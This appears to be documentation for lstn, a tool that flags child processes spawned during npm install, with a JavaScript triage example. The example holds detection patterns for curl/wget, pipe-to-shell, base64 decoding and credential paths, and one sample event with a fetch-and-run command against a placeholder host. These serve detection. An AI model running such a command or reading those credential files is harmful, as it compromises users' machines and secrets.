Spawning child processes

To detect child processes, lstn monitors process activity on the system where it is installed and running. When a parent process spawns a new process, lstn collects information about both the parent and the newly spawned process, including the command line used to start the new process and the name of the parent process. It then uses this information to generate a message indicating that the parent process spawned a new process, in this case "npm install spawned a process".

For example:

{
  "message": "npm install spawned a process",
  "priority": "medium",
  "package_metadata": {
    "npm_package_name": "contextify",
    "npm_package_version": "0.1.15"
  },
  "process_metadata": {
    "commandline": "sh -c node-gyp rebuild",
    "parent_name": "node"
  }
}

During npm install, malicious child processes can be spawned to carry out activities such as:

  • crypto mining
  • reconnaissance
  • sensitive data exfiltration
  • insertion of malicious payloads
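
One way to triage events of the shape shown above so that routine build steps are separated from command lines that deserve a closer look. This is an added example, not lstn's own code: the allowlist, the pattern list, the `triage` and `unwrap` helpers, and the two `example-pkg` events are assumptions constructed for illustration.

```javascript
// Added example. The allowlist and patterns are illustrative assumptions,
// not lstn's own rules; tune them to the packages you actually build.
const EXPECTED = [/^node-gyp rebuild$/, /^prebuild-install\b/];
const SUSPICIOUS = [
  { tag: "network-fetch", re: /\b(curl|wget)\b/ },
  { tag: "pipe-to-shell", re: /\|\s*(sh|bash)\b/ },
  { tag: "encoded-payload", re: /\bbase64\b.*(-d|--decode)\b/ },
  { tag: "credential-path", re: /\.npmrc|\.ssh\/|\.aws\// },
];

// npm runs lifecycle scripts as `sh -c <script>`; strip that wrapper.
function unwrap(commandline) {
  const m = /^(?:\/bin\/)?(?:sh|bash)\s+-c\s+(.*)$/.exec(commandline.trim());
  return (m ? m[1] : commandline).trim();
}

// Classify one event: "review" if any suspicious trait matches,
// "expected" if it is a known build step, otherwise "unknown".
function triage(event) {
  const pkg = event.package_metadata || {};
  const cmd = unwrap((event.process_metadata || {}).commandline || "");
  const tags = SUSPICIOUS.filter((s) => s.re.test(cmd)).map((s) => s.tag);
  const verdict = tags.length ? "review"
    : EXPECTED.some((re) => re.test(cmd)) ? "expected" : "unknown";
  return { package: `${pkg.npm_package_name}@${pkg.npm_package_version}`, command: cmd, verdict, tags };
}

// First event is the one shown above; the other two are constructed samples.
const mk = (name, version, commandline) => ({
  message: "npm install spawned a process",
  package_metadata: { npm_package_name: name, npm_package_version: version },
  process_metadata: { commandline, parent_name: "node" },
});
const events = [
  mk("contextify", "0.1.15", "sh -c node-gyp rebuild"),
  mk("example-pkg", "0.0.0", "sh -c curl -s https://example.invalid/i.sh | sh"),
  mk("example-pkg2", "0.0.0", "sh -c node scripts/postinstall.js"),
];
for (const e of events) console.log(JSON.stringify(triage(e)));
```

The "unknown" verdict matters as much as "review": an install script that runs an arbitrary file from the package matches no pattern, so it should be queued for inspection rather than treated as clean.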